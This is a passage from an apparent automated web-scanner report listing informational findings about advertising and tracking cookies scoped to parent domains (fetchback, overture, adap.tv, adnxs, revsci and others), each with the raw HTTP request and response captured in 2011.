clk=1_1315099337; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 01:22:17 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/click HTTP/1.1
Host: clk.fetchback.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 01:22:17 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315099337_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 01:22:17 GMT; Path=/
Set-Cookie: cre=1_1315099337_34024:68292:2:121174:121256; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 01:22:17 GMT; Path=/
Set-Cookie: clk=1_1315099337; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 01:22:17 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 01:22:17 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Location: http://default.com
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif

13.27. http://cm.npc-mcclatchy.overture.com/js_1_0/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.npc-mcclatchy.overture.com
Path:	/js_1_0/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyMDIwMzSzMACx5Mjgw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Wed, 01-Sep-2021 01:20:48 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js_1_0/?config=1001507650&type=lifestyle&ctxtId=lifestyle&keywordCharEnc=utf8&source=npc_mcclatchy_sacramentobee_t1_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&ctxtCat=lifestyle&outputCharEnc=latin1&css_url=http://static.mcclatchyinteractive.com/static/styles/mi/third_party/yahoo/yahoo.css&tg=1&refUrl=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&du=1&cb=1315097138735&ctxtContent=%3Chead%3E%0A%20%0A%0A%0A%0A%0A%0A%0A%0A%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fb.scorecardresearch.com%2Fbeacon.js%22%3E%3C%2Fscript%3E%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fb.scorecardresearch.com%2Fbeacon.js%22%3E%3C%2Fscript%3E%3Cscript%20language%3D%22JavaScript%22%3E%0A%3C!--%20%0Avar%20gomez%3D%7B%20%0A%09gs%3A%20new%20Date().getTime()%2C%20%0A%09acctId%3A'D3FD89'%2C%20%0A%09pgId%3A'story-detail'%2C%20%0A%09grpId%3A'Sacbee'%20%0A%7D%3B%0A%0A%0A%2F*Gomez%20tag%20version%3A%207.0*%2Fvar%20gomez%3Dgomez%3Fgomez%3A%7B%7D%3Bgomez.h3%3Dfunction(d%2C%20s)%7Bfor(var%20p%20in%20s)%7Bd%5Bp%5D%3Ds%5Bp%5D%3B%7Dreturn%20d%3B%7D%3Bgomez.h3(gomez%2C%7Bb3%3Afunction(r)%7Bif(r%3C%3D0)return%20false%3Breturn%20Math.random()%3C%3Dr%26%26r%3B%7D%2Cb0 HTTP/1.1
Host: cm.npc-mcclatchy.overture.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:20:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyMDIwMzSzMACx5Mjgw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Wed, 01-Sep-2021 01:20:48 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 4565

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...

13.28. http://cm.npc-mcclatchy.overture.com/partner/js/ypn.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.npc-mcclatchy.overture.com
Path:	/partner/js/ypn.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

BX=228g5ih765ieg&b=3&s=bh; expires=Tue, 04-Sep-2013 20:00:00 GMT; path=/; domain=.overture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partner/js/ypn.js HTTP/1.1
Host: cm.npc-mcclatchy.overture.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:44:00 GMT
Set-Cookie: BX=228g5ih765ieg&b=3&s=bh; expires=Tue, 04-Sep-2013 20:00:00 GMT; path=/; domain=.overture.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private, max-age=86400, must-revalidate
Last-Modified: Tue, 03 May 2011 10:14:38 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript
Content-Length: 8564

// -- defaults --
ctxt_ad_interface_default = 'http://ypn-js.ysm.yahoo.com/d/search/p/ypn/jsads/';
ctxt_ad_width_default = 468;
ctxt_ad_height_default = 60;
ctxt_ad_partner_default =
...[SNIP]...

13.29. http://companion.adap.tv/companion/post previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://companion.adap.tv
Path:	/companion/post

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

adaptv_unique_user_cookie="-6220387657706691463__TIME__2011-09-03+18%3A22%3A21";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:22:21 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /companion/post HTTP/1.1
Host: companion.adap.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: close
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="-6220387657706691463__TIME__2011-09-03+18%3A22%3A21";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:22:21 GMT
Content-Type: text/html; charset=iso-8859-1
p3p: CP="DEM"
Cache-Control: no-cache
Content-Length: 1

13.30. http://control.adap.tv/control previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://control.adap.tv
Path:	/control

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A07%3A39";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:07:39 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

13.31. http://d.p-td.com/r/du/id/L21rdC80L21waWQvMzU5ODk3MA/mpuid/NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.p-td.com
Path:	/r/du/id/L21rdC80L21waWQvMzU5ODk3MA/mpuid/NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=4018048898892878422; Domain=.p-td.com; Expires=Fri, 02-Mar-2012 00:44:15 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/du/id/L21rdC80L21waWQvMzU5ODk3MA/mpuid/NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F HTTP/1.1
Host: d.p-td.com
Proxy-Connection: keep-alive
Referer: http://cti.w55c.net/ct/rubicon-cms2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

13.32. http://developers.facebook.com/plugins/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/plugins/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fdevelopers.facebook.com%2Fplugins%2F; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plugins/ HTTP/1.1
Host: developers.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: /docs/plugins
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fdevelopers.facebook.com%2Fplugins%2F; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.28.35.105
Connection: close
Date: Sun, 04 Sep 2011 01:22:23 GMT
Content-Length: 0

13.33. http://feedburner.google.com/fb/a/mailverify previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://feedburner.google.com
Path:	/fb/a/mailverify

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

S=izeitgeist-ad-metrics=t0E3hsRy46s:feedburner-control-panel=xLQwG_KvXxSf9t9O8zC_nw:photos_html=gkFJwX2XgYEBqqOKgqr6OA; Domain=.google.com; Path=/; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fb/a/mailverify HTTP/1.1
Host: feedburner.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.34. http://i.w55c.net/ping_match.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i.w55c.net
Path:	/ping_match.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F;Path=/;Domain=.w55c.net;Expires=Tue, 03-Sep-13 01:06:45 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ping_match.gif?ei=RUBICON&rurl=http%3A%2F%2Fpixel.rubiconproject.com%2Ftap.php%3Fv%3D4210%26nid%3D1523%26put%3D_wfivefivec_%26expires%3D10 HTTP/1.1
Host: i.w55c.net
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=6291/9346
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; matchrubicon=1; matchbluekai=1; matchaccuen=1

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 01:06:45 GMT
Server: Jetty(6.1.22)
Set-Cookie: wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F;Path=/;Domain=.w55c.net;Expires=Tue, 03-Sep-13 01:06:45 GMT
Cache-Control: private
Content-Length: 0
Location: http://pixel.rubiconproject.com/tap.php?v=4210&nid=1523&put=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F&expires=10
X-Version: DataXu Pixel Tracker v3
Via: 1.1 bfi061001 (MII-APC/2.1)
Content-Type: text/plain

13.35. http://ib.adnxs.com/getuid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/getuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=6422714091563403120; path=/; expires=Sat, 03-Dec-2011 01:22:43 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuid HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 01:22:43 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Sat, 03-Dec-2011 01:22:43 GMT; domain=.adnxs.com; HttpOnly
Location: &bimpd=
Date: Sun, 04 Sep 2011 01:22:43 GMT
Content-Length: 0
Connection: close

13.36. http://ib.adnxs.com/getuidnb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/getuidnb

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=6422714091563403120; path=/; expires=Sat, 03-Dec-2011 01:22:43 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuidnb HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 01:22:43 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Sat, 03-Dec-2011 01:22:43 GMT; domain=.adnxs.com; HttpOnly
Location: y
Date: Sun, 04 Sep 2011 01:22:43 GMT
Content-Length: 0
Connection: close

13.37. http://imp.fetchback.com/serve/fb/adtag.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/serve/fb/adtag.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=1_1315097051_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /serve/fb/adtag.js?tid=68283&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/6291/9346/15214-2.3214995.3237976?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315096959_34024:68283:1:0:0_34024:68292:2:118796:118878_34023:68293:1:119509:119509; uid=1_1315096959_1314893682667:5756480826433243; kwd=1_1315096959; scg=1_1315096959; ppd=1_1315096959; act=1_1315096959

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:44:11 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315097051_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:44:11 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 293

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68283&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/6291/9346/15214-2.3214995.3237976?url=' width='728' height
...[SNIP]...

13.38. http://imp.fetchback.com/serve/fb/imp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/serve/fb/imp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

cre=1_1315097051_34024:68283:2:0:92_34024:68292:2:118888:118970_34023:68293:1:119601:119601; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/
uid=1_1315097051_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/
kwd=1_1315097051; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/
scg=1_1315097051; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/
ppd=1_1315097051; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/
act=1_1315097051; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/imp?tid=68283&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/6291/9346/15214-2.3214995.3237976?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315096959_34024:68283:1:0:0_34024:68292:2:118796:118878_34023:68293:1:119509:119509; kwd=1_1315096959; scg=1_1315096959; ppd=1_1315096959; act=1_1315096959; uid=1_1315097051_1314893682667:5756480826433243

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:44:11 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cre=1_1315097051_34024:68283:2:0:92_34024:68292:2:118888:118970_34023:68293:1:119601:119601; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/
Set-Cookie: uid=1_1315097051_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/
Set-Cookie: kwd=1_1315097051; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/
Set-Cookie: scg=1_1315097051; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/
Set-Cookie: ppd=1_1315097051; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/
Set-Cookie: act=1_1315097051; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:44:11 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 5489

<style type="text/css">body {margin: 0px; padding: 0px;}</style><style type="text/css">
/*
TODO customize this sample style
Syntax recommendation http://www.w3.org/TR/REC-CSS2/
*/

button.fb-fi
...[SNIP]...

13.39. http://js.revsci.net/gateway/gw.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

udm_0=MLvv81MJYS5jpb4vCV71ElxQ9cJHI+OoAkk9e6pq0kVArFRgaSVo+Ku8pFsZ0sSX2gU5VXV/cXD2ShtoxVqM22YeOkkbJabx6POjY2RyZQkpiukWgEaXDEWPclzeoLQZTQRDDL+H9gO5cmv6G5BmbIxHKQ/xj9ssbFNfVI9MGleu9LAj2ntBCzEEkFvJOUQdLKxEkjYP5PF2pFaL/bCBSEyfngKL8aBrvfrsrWAb+or/MloD+pVmtp3nCezdAlVhUp6WcfJNc/sBm/MqRZsVs9JpPXwYog7hu3nLnhmYwoiwGINl4/TJohqQKbb1/aUu4gWV1Gm9KhPW8oqqoX95NFsQYLjqsQT62NLWKaI7s1qJBiSnKXN4AqK+dN4Ny5gElKS/iPUA4xrCNPVGIPmppAxKdpt69rEmB703Ut/V+p1KbirkHdMAW/T95jQMMFrrZRDQpFcnB5Y8PvYehxq0Jic0D+OatsX5+drr53CfRpEt1xhS5Prvg2x8Sz9dpdym+rvaIiObcqaLkbNNA0wR3E4Avt6X8hZN3fw7aWrEId7wJgT5T4TbLDxeBHyZS+biA1AaofPHqCsV8+NCw7j0g4Ko+/g9+zzBKVRsTn5HN27zRVFJ28YDwXVIIo4aLMddoIadm7sqIRe59bhXYV8BH2PF33MO; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:17 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=J06575 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6k3FFNuXo3vkdcB6Qb/nUpD6A==; NETID01=c84fd631153807952fe54cd0e5ae7570; rtc_H9PS=MLuBc48HgVlDFVRDdcKRF0hEtq+QxWzJMWpcEHBw; rsiPus_-Jfi="MLs3rM9rsF9jIDGyCCr682K4CNg8X7Y5TcUKMiQFekBN/mLe5nqMalU+Gy7oNgbZiUlKeqNvah6Lt6J7LWR+El708xKeHRN+oI/OdQ15h+vMTW6JE0MEL7RHL9MaSpr1EQ5M4r4OllpRkRseMAEP4XpmNxvt4zBx4/LsxjIzx0J+4PMlNVWbY30OlroflhaTjXYvF17b"; rsi_us_1000000="pUMd5U+g/xMULsTCu+k7bfIrtGPDru2phlBoLeuoNfzhcyKV0v4e66ymwRf8sQAvMBtHyphI1d89vppu7+GTtHc81ZviwvzD0+T13dPv5yLdWC026bygOcgoBhWlndX/bqFGkOCQLHNPuGxFg+Rv+WRXlf/Ek1Yq8/wOPJ+T1zi6dv2OfuJEWpRpXdkwStGhjHefgqbGUJOFzgm6lXumZPudI1ur3H6poIG4XN+oq72CN1joRG9rDw4ZCPy3/BgaLnn/4lU70t5qBYPAVhshw8NrWAa2lsyt1g1gM6GKPOCI43TgdZSQilGDhE9IMICiwqhT3mDUXQBudDnXcEYmKXqcwh4KnN8ZpzAOSrJ7WE1pbGslC6X7wFB3pKV9Zsu6NbtMO31FQsuvlRunI5xxPdamEt7kY2EVjzzbmzTVxizSa9b3xlscu70TjKLqDpOaHosGHduftg4Epv+gVSczzkevXFWWxN0u1nnpPNLrbctfQmhfjFwkhwJbWSdFu7ySX1h+93uVK1v9nSO9EF2gdsrOwDU0PNKJ6bdGYIhBHXW2sbJdnlkH/Lfn/PkBEj2Hd9+bo+AJ4s3Oa3OeTgl3fpWZ1OtQVd8AeQsydIoKTtE/3QRuNlF2LV2jsQJHHucIwiETvNABG31SV74cz2jqv5zwiN7yalUwItqZn+d8NZT+50ZO5BxkJPG/UzpQgC3sdoKT8DaY9q4GXrs+cjZSQigz9xi9PGeGDr2RYdV3gmnDLWlv/w=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
